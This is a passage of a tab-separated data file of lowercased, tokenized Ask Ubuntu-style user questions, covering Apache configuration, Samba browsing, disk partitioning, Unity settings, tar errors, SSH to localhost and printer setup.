'/var/run/mysqld/mysqld.sock ' port : 3306 ( ubuntu ) 110414 19:25:40 [ note ] /usr/sbin/mysqld : normal shutdown 110414 19:25:40 [ note ] event scheduler : purging the queue . 0 events 110414 19:25:40 innodb : starting shutdown ... 110414 19:25:41 innodb : shutdown completed ; log sequence number 0 44233 110414 19:25:41 [ note ] /usr/sbin/mysqld : shutdown complete 110414 19:26:26 [ note ] plugin 'federated ' is disabled . 110414 19:26:27 innodb : started ; log sequence number 0 44233 110414 19:26:27 [ note ] event scheduler : loaded 0 events 110414 19:26:27 [ note ] /usr/sbin/mysqld : ready for connections . version : '5.1.49-1ubuntu8.1 ' socket : '/var/run/mysqld/mysqld.sock ' port : 3306 ( ubuntu )
35160	issue with `` servername '' upon boot or restart of apache2	the question : i keep getting this error on all apache2 restarts i have on my box here at my home , and i can not figure out how to get rid of it : * restarting web server apache2 apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.0.1 for servername any suggestions as to how i can get rid of this ? included files / updates /etc/hosts : http : //pastebin.com/nkxge97u
35161	setting up mailboxes for all users in a group	i have a group called users . it has many users . now i want every user in this group to have their own mailbox . so , for example , if john is such a user , then john @ myserver.com is an e-mail address . how can i accomplish this ?
35163	how do i get gnome-do to run terminal/bash commands ?	i just started using gnome-do ( awesome little application ! ) in the past few weeks , but am having one problem with it . i ca n't figure out how to get it to run terminal commands without opening the terminal , the same way that the `` run application '' dialogue can . for example , if i type pkill misbehavingapplicationx into gnome-do , it wo n't do anything . and typing run first does n't do anything either . any suggestions ?
35165	colour font installation ( emoji ) in maverick meerkat	i 've tried to install this apple emoji ttf font but even the font viewer does n't render them correctly . does anyone have an idea about whether this kind of font is supported in 10.10/gnome 2.32 ?
35168	ubuntu netbook update interrupted	i was updating my netbook latest version after 1st installation so a lot of updates where there . the updates were downloaded and it was being installed . the computer got switched off in between . now its not working . i want to just run the command `` apt-get upgrade '' . what is the procedure ...
35172	what is gsettings and what does unity use it for ?	i 've seen solutions for unity issues involving gsettings , such as how do i reset my unity configuration ? and how do i access and enable more icons to be in the system tray ? i have n't found out how to use it with unity . is it documented somewhere ?
35175	how do i upgrade python-scipy to something newer than 0.7.0 ?	i would like to make use of some of runge-kutta based ode integration . apparently this is implemented in scipy since feb 2009 but lucid ships with scipy 0.7.0-2 and does not have it yet . so how can i upgrade to a higher scipy ( say 0.8.0 ) with a minimum amount of dependency hell ?
35176	bring up restart / shut-down dialog box using the keyboard	which keyboard short cut is there to bring up the restart / shut-down dialog ?
35180	rsnapshot push to the server from the client	i have found out that rsnapshot is great tool for backing up my stuffs for local file system . now i need to do rsnapshot_push.conf file where i give params to rsync server . what is the right way to do this ? can i use rsync to /rsnapshot-backups/localhost/ syncing it to rsync server .
35182	unable to open `` windows network '' to see other computers on lan	i have my machine connected to our office lan which has many other machines that use win xp , win 7 etc . until a month or so ago , i was able to share files and folders with them , but now i ca n't even see what machines are there on my lan , let alone access their files . i tried accessing a machine by its name , by opening smb : //machinename , but that says error : failed to retrieve share list from server please select another viewer and try again . i tried restarting samba with sudo service samba restart , but that says samba : unrecognized service , but then samba is shown as installed in synaptic . i am pretty much stuck on this . any ideas on how to fix this ?
35183	configure trackpoint sensitivity using a gui	i have a lenovo thinkpad t61 , which uses a trackpoint . every time i reinstall ubuntu , the default sensitivity settings are much too low ( it feels like i really have to push to move the cursor ) . i 've been changing this manually for quite a few releases now , creating startup scripts to automatically change obscure configuration files as denoted at thinkwiki.org . about a year ago , i found gpointing-device-settings , which looked like the answer to my prayers ( and in some ways it is ) . unfortunately , despite the description and pictures on the gnome.org page , i can not use this gui to control the trackpoint sensitivity ( it 's not an option ) . i 've also heard of configure-trackpoint , but last i tried ( a year ago ) it did n't save your sensitivity settings ( you need to make a startup script ) . i really dislike opening a terminal and/or creating scripts to set my trackpoint mouse sensitivity . is there any way around all this using a gui ? it feels like there should be .
35184	variables in bash	for i in *.jpg do j = ' $ i | cut -d . -f 1' convert $ i $ j '' .png '' done temp.sh : line 3 : j : command not found i know about mogrify , just wanted to know how to get variables done in bash .
35188	localization of kturtle	i 'm trying to localize kturtle in bengali ... but i found the way very difficult to start it . please suggest some easy way ( ide-which is used to debug or edit the source code ) . where i can find the source code ?
35191	how to partition a new 500gb hd only installing ubuntu 10.10 ?	my thinkpad hd went bad , so i opted for an upgrade to a 500gb one . how should i partition it , and in what order ? looking around various forums , i 've come up with the following scheme so far : /dev/sda /dev/sda1 primary ext4 /boot 499 mb /dev/sda2 primary ext4 / 19999 mb /dev/sda3 primary swap 5999 mb /dev/sda5 logical ext4 /home 473606 mb should i add separate partitions for /usr , /var , or any others ? and does it matter what order i create them ? i seem to remember reading a long time ago that your swap partition should always be at the end of your disk . i 'm fairly new at this , but i love ubuntu . thank you , mike
35201	how to install covergloobus ?	i like ubuntu 11.04 very much . but i miss covergloobus . is there a way to install it in natty ?
35204	jwhois not working	i have installed jwhois on many systems , but ca n't get it to work . the port 43 is open through the firewall and i can do a telnet to the whois server on port 43 , but whenver i run jwhois i get the following error : [ querying whoisserver ] [ unable to connect to remote host ] any idea on how to fix this issue ?
35211	can i buy less than 20gb of additional storage on ubuntu one ?	could you please add smaller packages ( 1-2gb for example ) for a cheaper price ? the 20gb is too much for me and i see no point paying for something i propably wo n't use . thanks in advance .
35212	can i install updates while software center is installing ?	i 'm using ubuntu 10.10 maverick meerkat in dual boot with windows xp sp3 and am having issues while installing packages/programs in ubuntu . not that they do n't install but parallel installation is not supported . by this i mean , i ca n't install updates while software center is installing . is there a way i can configure this ?
35221	ubuntu server automatically insert password using python3	i 'm trying to create a small python3 program for my friend which will install and configure the nessarcary set-up for his ubuntu server . i want him to be able to start the program , give some basic information and be able to just leave the program to run . the thing is , to do this i need the python file to send the password to the cl when requested for sudo commands . i tried doing this for updating the ubuntu server : os.system ( 'sudo aptitude update & & sudo aptitude dist-upgrade ' ) os.system ( password ) after having the program request the password with this : password=input ( 'please enter your password ' ) but it did n't work . the cl just sits there waiting for the user to enter the password manually . is ther anyway to get around this ? thanks !
35223	syntax for socks proxy in apt.conf	i want to add socks proxy settings to /etc/apt/apt.conf . what is the syntax for it ? is it same as http and ftp syntax ? thanks .
35227	reopen a python file where it left off after restarting	i am creating a quick python3 program and at one part the server will need to be restarted . the thing is , that is not the end of the what the python file is supposed to do . is there a way to make it start up from where it stopped when the user restarts or ( if that is n't possible ) automatically open a 2nd python file , which will continue with the rest of the task required . thanks !
35231	wubi boot error	i installed wubi netbook edition a week back from win xp service pack 2 when i boot into ubuntu the screen flickers and it reboots . now i do n't have windows anymore on my notebook asus l3800 . it just shows : ubuntu generic ubuntu recovery ubuntu netbook now which one should i go in to reboot ? i do n't want to access windows anymore in the future . i do n't have any cd to reinstall it as i am comfortable with ubuntu . i get 2 boo chain loader : with generic , i get a quiet silence in insmod with netbook , i get instrid
35233	how to enable overlay scrollbars ?	i read that from natty beta 2 overlay scrollbars are default , but my installation is a fully updated one that i installed from an alpha release . i think the settings did not kick in from the update so i want to know how to enable it ( there are plenty posts on how it disable it though ) ?
35237	reporting system unity freezes	i have ubuntu natty 11.04 beta 2 installed . i did have some compiz freezes which i reported . however today i got a system freeze ... everything was frozen ... keyboards did not respond , clicking everywhere did not work and the only way was to hard reboot the system . scenario 1 : i was playing supertuxkaart in full screen and suddenly it froze ... only a hard reset was the solution . ( did not try it again though ) scenario 2 : had unity running for nearly 4 hours , worked on documents , listening to music and then all of a sudden it froze . this system freeze is not conventional like after you login there is no unity or it froze after 2-3 mins of login.. however how can i report this to launchpad since i do n't know what caused the freeze and also the system could n't generate any bug reports since i did a hard reboot ?
35238	cpu frequency scaling in unity ?	in ubuntu 10.10 , i added the cpu scaling applet on my panel in order to control the cpu frequency scaling . since unity no longer has a panel that supports applets , what mechanism do i use in 11.04 to achieve the same goal ?
35242	how do i enable overlay scrollbars in firefox ?	i like the overlay scrollbars that come with natty beta 2 by default ! how do i enable them on fx4 ?
35243	is there a programmable way to tell if the screen is locked ?	i have lots of stuff in my crontab , including some that talks to my screen . if i 'm not there for it to be notifying , i do n't really want it to run . is there a way i can check to see if the computer is locked , so i can keep it from doing things when i 'm not at my desk ? or , alternately , do other things only when i 'm not at my desk ?
35244	what is cygwin compiler ?	what is cygwin compiler and how can i install it ? i have no internet connection and am unable to install any .tar.gz file . an online forum suggested me that i should compile these files . what is this compilation , will the previously mentioned cygwin compiler work for me to compile these sources ?
35250	screen freezes upon screensaver when playing video	trying to install natty on a pent dual , core 2.50 ghz , 4gb ram , nvidia 8400 with 260.19.44 . i have 10.10 installed and it works perfect . when i install 11.04 all goes well but when it goes in to screensaver it seems to freeze up and takes a few minutes to come out of it , cant use menu or any icons . was wondering if anyone has any idea if i am doing something wrong or should i change something ? ? tyavmia : - )
35253	video performance on a lenovo t520 is slow	i have a new lenovo t520 with 8gb memory and a i7 cpu . it 's the first time i 'really ' install ubuntu on a pc . i have about six months of experience with ubuntu as a guest os on windows in a vm . now what is really annoying me is how slow the visuals are on my laptop . mostly noticeable when i have to resize or move a window . also when scrolling text in vim/browsers it 's not really as smooth as i would like it . i read that lenovo is using optimus drivers for their new laptops and that these are n't supported . so i was wondering could using the integrated intel gpu be the problem ? the cpu i have is the coreâ˘ i7-2620m ( 2.70ghz , 4mb l3 , 1333mhz fsb ) . i have tried to enable desktop effects but that did n't work .
35259	the best way to edit a video mp4 file	i have a sony bloggie camera that produces mp4 files . i want to edit them and upload them as fast as possible to youtube , in the best quality available . currently i 'm using kdenlive , that gives me a relative good output in .mpeg in hd 1280x720 , but the rendering takes sometimes 4-5 hours for a 15 min clip edited project . is there a better way ? btw , i 'm on 10.04 on a dell studio 1557 .
35262	can unity run smoothly on an hp mini 210-1000	i own an hp mini 210-1000 , and i am aware that it meets the system requirements for the unity shell . my concern is that , with my previous unfortunate experience with the 10.10 une version of unity , my netbook wo n't be able to smoothly run unity . my computer specs are : cpu : 1.66ghz intel atom memory : 1gb ddr2 , 667mhz graphics : intel速 graphics media accelerator 3150 i am currently using unity 2d on maverick via the ppa , but i 'm not very productive with window managers apart from compiz . i 'm also aware that the compiz unity wo n't be backported to maverick , which is understandable , but still a shame . thanks in advance .
35264	how can i get the taskbar to spread over multiple rows ?	i use ubuntu 10.10 . when i have a lot of windows open , it 's hard to read them in the taskbar because there 's only room for a few characters of each window 's title . how can i increase the number of rows available , like in windows ?
35265	is there a better ( closer to home row on keyboard ) shortcut for the home directory in bash than tilde ?	i do n't like reaching for the tilde ~ key so often when i 'm specifying file and program paths relative to the user home directory on the command line . does anyone have any tips for cutting the number of keystrokes down ?
35266	extra dash insertion when trying to run tar	i have a really weird issue where i 'm getting an extra - insertion on tar : # tar -zxvf mod_wsgi-3.3.tar.gz /bin/tar : unrecognized option ' -- zxvf' try `tar -- help ' or `tar -- usage ' for more information . the same issue happens if i try to do -- help # tar -- help /bin/tar : unrecognized option ` -- -help' try `tar -- help ' or `tar -- usage ' for more information . but if i drop the first - both of the above examples work . any ideas on how i can find and disable whatever is causing that ?
35272	is the current warty-final-ubuntu wallpaper going to be like that until the final release ?	is the current natty 's warty-final-ubuntu wallpaper going to be like that until the final release ?
35273	installing nvidia drivers from website	my toshiba laptop has an nvidia graphics card which is not supported in ubuntu , and there is no entry in `` additional drivers '' i tried installing the driver from the nvidia website ( which does have a linux 64bit version ) but nothing happens zwhen i click the .run file ( i have made it executable ) .
35276	notebook + external monitor = system crash	i would like to use an external monitor with my hp probok , but when i connect the cable to my notebook , it 's screen turns black and the external screen starts to flicker pink and green . i use 11.04 . any ideas ?
35277	install on toshiba ac100	the toshiba ac100 netbook is a tegra 2 machine . is there a possibility to install ubuntu ( any version ) there ;
35279	installing bsnl utstarcom 300r2u adsl2+ modem via usb port	anoop @ blacktiger : ~ $ lsusb bus 004 device 002 : id 0451:6060 texas instruments , inc. rndis/bewan adsl2+ bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 002 : id 045e:00cb microsoft corp . basic optical mouse v2.0 bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 0781:5567 sandisk corp. cruszer blade bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub i have a modem , utstarcom 300r2u modem . i need to install this using usb . i need to do this for demonstrating a concept to my friends . lsusb lists this device bus 004 device 002 : id 0451:6060 texas instruments , inc. rndis/bewan adsl2+ it is installed but i need a better way to configure this adapter . my modem is configured to connect automatically to internet ( always on option ) . can anyone help me to use this modem via usb ? pls.. i need to prove that linux is capable of doing everything ... last few lines of dmesg [ 15.658156 ] nvrm : loading nvidia unix x86 kernel module 270.29 wed feb 23 16:16:53 pst 2011 [ 15.759823 ] ppdev : user-space parallel port driver [ 17.397141 ] ext4-fs ( sdb1 ) : re-mounted . opts : errors=remount-ro , commit=0 [ 20.086931 ] ext4-fs ( sdb1 ) : re-mounted . opts : errors=remount-ro , commit=0 [ 25.080006 ] eth0 : no ipv6 routers present [ 165.201492 ] usb 4-1 : usb disconnect , address 2 [ 167.688012 ] usb 4-1 : new full speed usb device using ohci_hcd and address 3 ubuntu 10.10 fully updated..sudo wvdialconf anoop @ blacktiger : ~ $ sudo wvdialconf [ sudo ] password for anoop : editing `/etc/wvdial.conf ' . scanning your serial ports for a modem . modem port scan < *1 > : s0 s1 s2 s3 installation of ubudsl fails.. my system just hangs after installation . restarting solves the issue . but ubudsl is not installed . any work around for this ? ? i need configure this usb device as an ethernet device ( eth1 ) in networks . how do i set this ? i pls help..
35282	what is the difference between `` certified '' and `` ready '' hardware ?	what is the difference between `` certified '' and `` ready '' hardware for ubuntu ? ubuntu certified
35286	apt-get fails with : `` can not utime ''	i have an issue where apt-get fails with the error message `` can not utime '' : tar : ./postinst : can not utime : bad file descriptor tar : ./preinst : can not utime : bad file descriptor tar : ./prerm : can not utime : bad file descriptor tar : ./md5sums : can not utime : bad file descriptor tar : ./control : can not utime : bad file descriptor tar : . : can not utime : bad file descriptor tar : exiting with failure status due to previous errors dpkg-deb : subprocess tar returned error exit status 2 dpkg : error processing /var/cache/apt/archives/apache2-mpm-prefork_2.2.14-5ubuntu8.4_i386.deb ( -- unpack ) : subprocess dpkg-deb -- control returned error exit status 2 errors were encountered while processing : /var/cache/apt/archives/apache2-mpm-prefork_2.2.14-5ubuntu8.4_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) this seem to be related to tar as if i follow the instructions in a post on ubuntuforums.org and create a user defined tar /usr/local/sbin/tar the error stops happening . # ! /bin/sh exec /bin/tar -- touch - '' $ @ '' however that solution caused me to ask a question about extra dash insertion when trying to run tar . i would much prefer to just have regular tar working .
35289	one line command for adding new items to com.canonical.unity.panel systray-whitelist	this is more of a how to use command line instruction question more than how to add items to the unity notification panel . i have to have a one line cli to add a new item to com.canonical.unity.panel systray-whitelist . standard procedure for doing so is : sudo gsettings get com.canonical.unity.panel systray-whitelist we get [ 'javaembeddedframe ' , 'wine ' , 'skype ' ] then we do the second command sudo gsettings set com.canonical.unity.panel systray-whitelist `` [ 'javaembeddedframe ' , 'wine ' , 'skype ' , 'shutter ' ] '' while that 's great and all , it requires people to copy and paste the result from the first line , and for a script i am writing i want to do it in one command . so far this is what i have : sudo gsettings set com.canonical.unity.panel systray-whitelist | gsettings get com.canonical.unity.panel systray-whitelist | sed -e `` s/ ' ] $ / , 'shutter ' ] / '' | awk 'nf { print `` \ '' '' $ 0 `` \ '' '' } ' i think i am missing something . firstly , i am not sure if i am piping the string into gsettings set function correctly . secondly , while i think i am parsing the output from gsettings get function correctly , i would n't figure out a way to add the `` `` around the modified result using sed , so i had to pipe another awk command into this mess . thanks to anyone that helps .
35297	using python3 to install git - > if statements/file reading error	as part of a larger program , i am using git to check the program itself for updates . of course , the user will need git installed to do so . i 've created a small bit of python3 code to check if the user has git installed , but it does not seem to work : import linecache import time import os git = linecache.getline ( 'info.txt ' , 2 ) if git == 'no ' : git-ask=input ( 'is git installed ? < y/n > \n ' ) if git-ask == 'n ' : print ( 'installing git . ' ) os.system ( 'apt-get install git-core ' ) elif git-ask == 'y ' : print ( `` checking for updates ... '' ) elif git == `` yes '' : print ( `` checking for updates ... '' ) else : print ( `` error : 'gitinfoerror ' '' ) print ( `` please contact eden about this error : edenc @ dev-hq.net '' ) time.sleep ( 5 ) print ( `` skipping updates ... '' ) the program always reverts to else clause , which should never happen ! here is the contents of info.txt : git : no reboot : no thanks for any advice you can offer !
35299	desktop shortcut that takes users to a print server	how do i make a desktop shortcut that will take users to a windows 2008 server and let them pick a printer ? i want to make adding printers as painless as possible , as i am making an ubuntu disc image that will be used on many laptops . i do n't want to add the printers ahead of time , as there would be too many and it would confuse users . i know this can be done through the print menu , but i do n't want my users to have to click through multiple dialog boxes . some sort of shortcut to launch the `` smb browser '' and point it to a windows 2008 server sharing printers would be great . edit : what i 'm looking for is a command line interface to system-config-printer that directs users to a windows print server where they can then pick a printer to install .
35301	static ip address changed to another static ip address . what needs to be changed ?	my static ip was on verizon 's network , who are subletting their fios lines to frontier . now i am given a new static ip from frontier 's data network . may i have a ballpark list of configurations to change to the new ip ? it is like me to miss one thing and cause a problem . i have a lamp with proftpd & ssh tunneling .
35302	odd issue , wubi installation wo n't boot , when another ext4 drive is plugged ?	it 's an odd issue , i installed ubuntu 11.04 trough wubi yesterday , it actually worked unlike the last time i tried to when it did n't boot at all . but there is one thing that bugs me , see , i have 2 hdd 's , a 320gb one with windows 7 , and the other , a 500gb hdd with ubuntu 10.10 . i have partitioned the 500gb hdd , and contains a ntfs partition , and a ext4 plus the swap partitions . the 320gb is not partitioned , as it only has windows 7 . since i installed wubi on windows 7 , when i have my ubuntu drive connected , wubi wo n't boot the installation , giving me a `` no wubdir '' error . however , if i phisically unplug the ubuntu drive , then wubi boots just fine . so , how is the ubuntu drive interfering with wubi , to the extent of wubi not even working when the drive is plugged ? .
35303	linux-swap partition is in extended drive	my apology if my question sounded silly , but i am very new to ubuntu . i have just formatted my pc to ubuntu . however , i found out that now i have 3 partitions in my harddisk . one is the ext4 /dev/sda1 which is the system file partition . however , i noticed that i have another partition called extended /dev/sda2 3.08g , and the linux-swap /dev/sda5 is under the extended partition as shown in gparted . may i know is the ubuntu installed correctly ? i can only access to my main system partition , and have lost 6g . my harddisk is 80g and ram 1.5g . thanks .
35304	can i slow the speed of the cursor on a laptop touchpad ?	the cursor is too jerky and moves too fast when i use the touchpad on my laptop in ubuntu 11.04 beta 2 . when i use windows the cursor moves slowly and smoothly with precision . but on ubuntu 11.04 beta 2 , the cursor is too fast and wobbly , imprecise . when using the touchpad , is there a way i can slow the cursor down and make it more smooth and precise ? i 'm using a lenovo t410 laptop .
35308	is there a process indicator for unity ?	hi ! i have just upgraded to the 11.04 ubuntu beta and am trying to get used to unity . seems good so far , but i really miss having the gnome process monitor at the top panel . ( really useful when running long compilations/testing since it is usually enough to glance at it to see if everything is going as it should . ) is there any substitute in unity ?
35310	can i boot straight into bash from a usb drive installation ?	i need to boot from a usb drive installation of ubuntu 10.10 to do some maintenance on an older machine , and i do n't feel like waiting for five minutes for the gnome to log me in . is there a boot option that i can specify that will allow me to boot straight into bash ?
35312	firefox hidden cookies not in cookies.sql ?	when i access nadex.com quotes , firebug tells me i send these cookies ( but it 's really all one line ) : jsessionid=qk3lnyhpqcpgpfx4bghpjld2ml90tnx3lkvpvplcvdmjygrgzth5 ! 1308128606 ! -757\ 827124 ; bhcookiesess=1 ; bhcookieperm=1 ; igforexcookie= ; ls__lsengine_s=exist_13\ 02897154477 ; ls__lsengine_k=share_session ; ls__https : //demo-mdp.nadex.com=1 ; ls\ __lsengine=73 ; iconstatesetting=/dealing/pd/cfd/login/loginuser.htm ? iconsenable\ d=true ; homeurl=https : //demo.nadex.com/content/sites/ndx/en_us/ ; showdmahelp=fa\ lse and firefox 's `` edit/preferences/privacy/remove individual cookies '' seems to agree . however , when i look at cookies.sql , some cookies above do n't show up : cp ~/.mozilla/firefox/xxxxxxxx.default/cookies.sqlite /tmp & & \ echo `` select name from moz_cookies ; '' | sqlite3 /tmp/cookies.sqlite |\ sort | uniq ( note that i must `` cp '' since the original db is locked by firefox ) . the result 's ugly + unhelpful , but i specifically noted these values do not appear even though i 'd expect them to : jsessionid ( probably the most important one ) homeurl showdmahelp possibly others how can i find these `` hidden '' cookies ? i 'm writing a perl/curl script to download data , but it does n't work w/o the jsessionid cookie ( and handcopying from firebug is n't automatic enough , plus jsessionid changes often ) edit ( too long/unwieldy for a comment ) : @ lekensteyn thanks for the gm script ! it does n't update webappsstore.sqlite when i visit nadex.com and login , but it does update sessionstore.js , which contains : { `` host '' : '' www.nadex.com '' , '' value '' : '' 3x0lnpvgdhqq\ xls7fxbqtj2pfll0gsyk9yvbkps09r4yvqyzdmws ! -1593496027 ! 1301994507 '' , '' path '' : '' /price\ stream '' , '' name '' : '' jsessionid '' } all on one line ( in fact , the entire file is a single line ) . however , i have n't yet checked to see if that has anything to do w/ the gm script , or is something that happens anyway . at the very least , it gives me a new place to dig .
35324	what 's the best chat client ?	i 've recently switched to ubuntu from windows , and i 'm looking for alternatives for gtalk and windows live messenger . so which chat client do you use most ?
35325	how do i access an ntfs storage partition ?	i upgraded to 11.4 beta ( absolutely fantastic ) on asus eee pc 1005ha . i have a ntfs storage parition ( /dev/sda4 ) visible by gparted . however , i can not access it via ubuntu . any tips or ideas ?
35327	why wo n't hp print driver print past a test page ?	why wo n't hp dj1000j110 printer print more than the test page ? job goes to print queue , flashes for a moment , then disappears and the printer does not print anything . printer driver is hplip-3.11.3a.run . install telemetry available upon request .
35332	why does empathy show a transparent video preview and then crash ?	when i try to use empathy video chat , no matter what settings i use , it shows a transparent preview , then the video window closes ( crashes ) i 've not gotten any relevant output from the commandline , so i 'm not sure what to do . if anyone can help me i 'd appreciate it greatly ! update : still happens on 11.04 , i 'm getting nowhere in fixing it . anyone wan na help ? do i need to start a bounty ? ? ? ? ? ? ?
35333	how do you record the audio from a web flash video , e.g . from hulu or youtube , and make an audio podcast	i want to record the audio from flash videos on youtube or hulu to listen to later on my ipod or sandisk mp3 player . is there any combination of tools that can accomplish this ? is it possible to record the audio in the background without having to listen to it while it 's recording ?
35335	how do i get unity back after gnome shell install ?	i was running an up to date version of ubuntu 11.04 . for the purpose of a review , i decided to install gnome shell along side my unity session . but after the process was completed , i can no longer log into the unity session . is there a way to remedy this ? thank you !
35336	ca n't ssh into a hadoop node	all right folks , i have another very basic question . please bear with me . i 'm following the instructions at the following website to download and configure hadoop on my computer . http : //www.michael-noll.com/tutorials/running-hadoop-on-ubuntu-linux-single-node-cluster/ i 'm at the final ssh section , when i use the localhost command . when i run the following code , i get an error message . hadoop @ amathew-dimension-3000 : ~ $ cat $ home/.ssh/id_rsa.pub > > $ home/.ssh/authorized_keys hadoop @ amathew-dimension-3000 : ~ $ ssh localhost ssh : connect to host localhost port 22 : connection refused here 's some other information which might be relevant . hadoop @ amathew-dimension-3000 : ~ $ ssh -vvv localhost openssh_5.5p1 debian-4ubuntu5 , openssl 0.9.8o 01 jun 2010 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : connecting to localhost [ : :1 ] port 22. debug1 : connect to address : :1 port 22 : connection refused debug1 : connecting to localhost [ 127.0.0.1 ] port 22. debug1 : connect to address 127.0.0.1 port 22 : connection refused ssh : connect to host localhost port 22 : connection refused can anyone help ? once again , thanks for helping the newbie who just ca n't figure things out yet .
35339	select pages for pdf print	i am printing the current page of a pdf file in evince . but i found that in evince , there are two different page numbers showing the current page . if i choose the one shown in an input box , that will print out the wrong page , but if i choose the one shown inside the parenthesis after the input box , that will be the correct one . i was wondering what is the difference between the two numbers shown for the current page ? why selecting pages for printing works that way ? thanks and regards !
35340	how to change the default printer in evince ?	i have several printers listed in evince . i was wondering how to change the default printer in evince ? thanks and regards !
35346	how to fix grub with grub rescue	ok , so i had 10.10 as my main operating system , no other one . and i wanted to try the beat 1 of 11.04 and i liked it but wanted to put fedora alpha in there . and somehow the beta had the boot flag and it goes into grub rescue , what i wish to do is fix it so the 10.10 is the boot flag and it boots to that .
35347	how do i get custom icon for apps in unity dash	how do i assign an icon for programs which does n't have any specific icons ? ( ie . vncviewer , rdesktop , etc ) . today it appears as a gray icon with question mark on the middle as a default icon in unity launcher .
35350	problems with saving filled form in pdf	i am filling out 1040 tax form in evince . every time i try to save my input by ctrl+s , i am asked to `` save as '' in a dialog box . is it possible to save to the current file without having the dialog box popping out each time ? on right middle of the first page , there is a box following âadd numbers on lines above '' . i enter a number and try to save it , but after answering the same `` save as '' dialog box as above , evince exists unexpectedly , and after i reopen the file , the input to that box is gone . if i try to print to file , the number in the box is kept , but the file no longer has fillable forms . so i was wondering why this happens ? is there a way to save the input to that box without losing the forms ? thanks and regards ! p.s . my evince version is document viewer 2.32.0 using poppler/cairo ( 0.14.3 ) . my os is ubuntu 10.10 added : i just found that i have to make the color of the input change from black to blue , before saving the pdf file , so that the saving is normal as usual and the pdf will not close itself unexpectedly . is this the same thing that happens for you ?
35353	recommended method to backup ubuntu server	i am a windows administrator standing up an ubuntu server for some intranet lamp applications . i have read through some of the ubuntu documentation but am not clear on a good way to get backups of the system . obviously what i would like to do is be able restore the application data ( and perhaps applications ) if an issue occurs to the box . i would like the schedule the backup to run daily . what are ( is ) the recommended way to backup up an ubuntu server ? am i able to direct backups to a network share where they will be put to tape ? what is involved in restoring the data ?
35359	iso to usb || ubuntu to windows	trying to get a windows 7 iso to be written to a bootable usb from my ubuntu installation , but it seems all the usb creators are for writing other linux distributions , and the ones for windows can only be run in windows . catch 22 , right ? i 'm debating setting up a vm to run the windows usb creator , but would prefer not to have to install the accursed not operating system twice in one day .
35361	is burg compatible with 11.04 ?	has anybody tested burg on natty ? is it safe ?
35363	ca n't boot without 'nolapic ' kernel option . and system hangs after few minutes	the title describes my problem . also with 'lapic ' option , only one core is enabled . tried with 10.10 ( amd64 ) , 11.04 ( amd64 ) 10.10 x86 version did n't boot with nolapic option . now i 'm using 11.04 amd64 version ( updated ) . /proc/cpuinfo : processor : 0 vendor_id : authenticamd cpu family : 16 model : 4 model name : amd phenom ( tm ) ii x4 955 processor stepping : 3 cpu mhz : 800.000 cache size : 512 kb physical id : 0 siblings : 1 core id : 0 cpu cores : 1 apicid : 0 initial apicid : 0 fpu : yes fpu_exception : yes cpuid level : 5 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm 3dnowext 3dnow constant_tsc rep_good nopl nonstop_tsc pni monitor cx16 popcnt lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs skinit wdt npt lbrv svm_lock nrip_save bogomips : 6495.17 tlb size : 1024 4k pages clflush size : 64 cache_alignment : 64 address sizes : 48 bits physical , 48 bits virtual power management : ts ttp tm stc 100mhzsteps hwpstate my new computer 's spec is , ( sadly : ( ) amd phenom ii 955 asrock 770icafe gv-r577sl-1gd ( gigabyte 5770 vga ) output of lshw command : mattengi-desktop description : desktop computer product : to be filled by o.e.m . ( to be filled by o.e.m . ) vendor : to be filled by o.e.m . version : to be filled by o.e.m . serial : to be filled by o.e.m . width : 64 bits capabilities : smbios-2.5 dmi-2.5 vsyscall64 vsyscall32 configuration : boot=normal chassis=desktop family=to be filled by o.e.m . sku=to be filled by o.e.m . uuid=00020003-0004-0005-0006-000700080009 *-core description : motherboard product : 770icafe vendor : asrock physical id : 0 *-firmware description : bios vendor : american megatrends inc. physical id : 0 version : p1.50 date : 09/07/2010 size : 64kib capacity : 960kib capabilities : pci upgrade shadowing cdboot bootselect socketedrom edd int13floppy1200 int13floppy720 int13floppy2880 int5printscreen int9keyboard int14serial int17printer int10video acpi usb ls120boot zipboot biosbootspecification netboot *-cpu description : cpu product : amd phenom ( tm ) ii x4 955 processor vendor : hynix semiconductor ( hyundai electronics ) physical id : 4 bus info : cpu @ 0 version : amd phenom ( tm ) ii x4 955 processor serial : to be filled by o.e.m . slot : cpusocket size : 3200mhz capacity : 3200mhz width : 64 bits clock : 200mhz capabilities : x86-64 fpu fpu_exception wp vme de pse tsc msr pae mce cx8 sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp 3dnowext 3dnow constant_tsc rep_good nopl nonstop_tsc pni monitor cx16 popcnt lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs skinit wdt npt lbrv svm_lock nrip_save cpufreq configuration : cores=4 enabledcores=4 *-cache:0 description : l1 cache physical id : 5 slot : l1-cache size : 512kib capacity : 512kib capabilities : pipeline-burst internal varies data *-cache:1 description : l2 cache physical id : 6 slot : l2-cache size : 2mib capacity : 2mib capabilities : pipeline-burst internal varies unified *-memory description : system memory physical id : 11 slot : system board or motherboard size : 4gib *-bank:0 description : dimm synchronous 667 mhz ( 1.5 ns ) product : partnum0 vendor : manufacturer0 physical id : 0 serial : sernum0 slot : dimm0 size : 2gib width : 64 bits clock : 667mhz ( 1.5ns ) *-bank:1 description : dimm synchronous 667 mhz ( 1.5 ns ) product : partnum1 vendor : manufacturer1 physical id : 1 serial : sernum1 slot : dimm1 size : 2gib width : 64 bits clock : 667mhz ( 1.5ns ) *-bank:2 description : [ empty ] product : partnum2 vendor : manufacturer2 physical id : 2 serial : sernum2 slot : dimm2 *-bank:3 description : [ empty ] product : partnum3 vendor : manufacturer3 physical id : 3 serial : sernum3 slot : dimm3 *-pci:0 description : host bridge product : rx780/rx790 chipset host bridge vendor : ati technologies inc physical id : 100 bus info : pci @ 0000:00:00.0 version : 